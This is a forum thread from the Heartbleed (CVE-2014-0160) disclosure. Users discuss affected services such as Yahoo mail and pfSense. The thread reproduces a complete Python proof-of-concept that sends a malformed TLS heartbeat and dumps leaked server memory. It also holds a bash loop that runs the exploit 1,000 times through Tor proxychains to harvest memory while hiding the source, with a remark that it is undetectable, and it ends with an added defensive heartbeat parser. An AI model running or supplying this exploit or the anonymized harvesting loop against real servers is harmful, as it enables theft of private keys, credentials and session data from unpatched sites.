This one looks fun, affects a wide range of servers, so you could potentially be affected indirectly since OpenSSL is the most widely used crypto lib out there.
This is pretty awesome
I would hate to be an admin of external facing sites with this shit in the wild.
It's lolz, mail.yahoo.com is vulnerable
They never should have dropped support for XP, we’re all doomed!
For once if you’re an IIS admin you’re having a happy day!
Yea because you're running around unplugging all those XP machines no longer supported today
[sarcasm]I'm sure MS found all the holes in XP by now anyway, those machines will be fine[/sarcasm]
PfSense is vulnerable we have been testing a bunch of stuff this morning…
This is going to be super useful on internal security assessments for years
OR
You’re sticking both index fingers in your ears and screaming “LA LA LA LA LA LA I CAN’T HEAR YOU LA LA LA LA LA” over and over again pretending that those XP machines will be just fine for a few more months.
I'm waiting to see what 0day gets dropped for XP once Microsoft officially washes its hands of it. I know people are sitting on some.
The fear is the 0day will drop and MS will do some out of band patch and kill it.
Yeah, my guess is that their conscience will get the better of them and they’ll fix the really bad ones.
But like you said, there isn’t just ONE of them out there I am sure. I am sure that there is quite a number of them.
blank file, can you get me this script?
This was the original script
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Python 2 script: uses print statements, xrange and str.decode('hex').
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
    # Turn a whitespace-separated hex string into raw bytes.
    return x.replace(' ', '').replace('\n', '').decode('hex')
# TLS 1.1 ClientHello record (content type 0x16) with a long cipher suite list.
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
# Heartbeat record (content type 0x18): a request that declares a 0x4000-byte
# payload inside a 3-byte record. A patched server ignores it.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print
def recvall(s, length, timeout=5):
    # Read exactly `length` bytes; return None on timeout or EOF.
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
def recvmsg(s):
    # Read one TLS record: a 5-byte header (type, version, length) then the payload.
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay
def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False
        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True
        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False
def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)
if __name__ == '__main__':
    main()
I added some stuff I will post my version up later but I just made it loop and save the output etc however a simple bash script like this would be fine
for i in {1..1000}; do proxychains4 -f ~/proxychains-tor.conf python ~/Downloads/ssltest.py site.com >> site.com.txt; done
It's not really detectable so proxychains is probably overkill
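For the defender side of the same exchange, here is an added example (not part of the thread or Jared Stafford's script) that parses TLS records in Python 3 and flags a heartbeat request whose declared payload_length cannot fit in the record, which is exactly the shape of the `hb` bytes above; `leaked_bytes` measures the "more data than it should" condition the script prints. The record and heartbeat layouts come from RFC 5246 and RFC 6520; the sample records are constructed here.

```python
import struct

# TLS record content type and heartbeat message types (RFC 5246 / RFC 6520).
CT_HEARTBEAT = 24
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16  # RFC 6520 requires at least 16 bytes of padding after the payload

def parse_record(data):
    """Split one TLS record into (content_type, version, body); None if truncated."""
    if len(data) < 5:
        return None
    typ, ver, ln = struct.unpack('>BHH', data[:5])
    body = data[5:5 + ln]
    return (typ, ver, body) if len(body) == ln else None

def check_heartbeat(data):
    """Return 'not-heartbeat', 'truncated', 'malformed' or 'ok' for one TLS record.
    'malformed': declared payload_length plus minimum padding exceeds the record."""
    rec = parse_record(data)
    if rec is None:
        return 'truncated'
    typ, _ver, body = rec
    if typ != CT_HEARTBEAT:
        return 'not-heartbeat'
    if len(body) < 3:
        return 'malformed'
    hb_type, payload_len = struct.unpack('>BH', body[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return 'malformed'
    return 'ok' if 3 + payload_len + MIN_PADDING <= len(body) else 'malformed'

def leaked_bytes(request, response):
    """Payload bytes echoed in a heartbeat response beyond what the request carried.
    Non-zero for a malformed request means the server copied memory it never received."""
    req, resp = parse_record(request), parse_record(response)
    if req is None or resp is None or resp[0] != CT_HEARTBEAT or len(resp[2]) < 3:
        return 0
    present = max(0, len(req[2]) - 3)                # payload bytes physically sent
    returned = struct.unpack('>H', resp[2][1:3])[0]  # payload bytes the server echoed
    return max(0, returned - present)

def heartbeat_record(hb_type, payload):
    """Build a well-formed TLS 1.1 heartbeat record (constructed sample data)."""
    body = bytes([hb_type]) + struct.pack('>H', len(payload)) + payload + b'\x00' * MIN_PADDING
    return b'\x18\x03\x02' + struct.pack('>H', len(body)) + body

# The request bytes from the script above, and a benign request for comparison.
SCRIPT_HB = bytes.fromhex('18 03 02 00 03 01 40 00')
GOOD_HB = heartbeat_record(HB_REQUEST, b'ping')
```

The same length check is what a patched OpenSSL performs before answering, so a server whose response carries far more than `present` bytes has not applied the fix.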
cool thanks, I actually got the script from a co-worker. Yeah I wrote a dirty little bash script (could be a one-liner I suppose) that loops through a list of sites and spits out the vulnerable ones. Sourced the list from the EVM platform and scanned everything already.
Yahoo patch their shit yet?
Nope
This stuff is over my head
2 Questions
Who is affected?
What are they subject to?
Mad skills. Such wow.
Everything that uses secure web traffic browsing. Banks, IM, website sessions, etc. If you have a vulnerable version of OpenSSL, your keys are compromised and you have to reissue certs and a ton of other crap. Pretty much this broke the internet.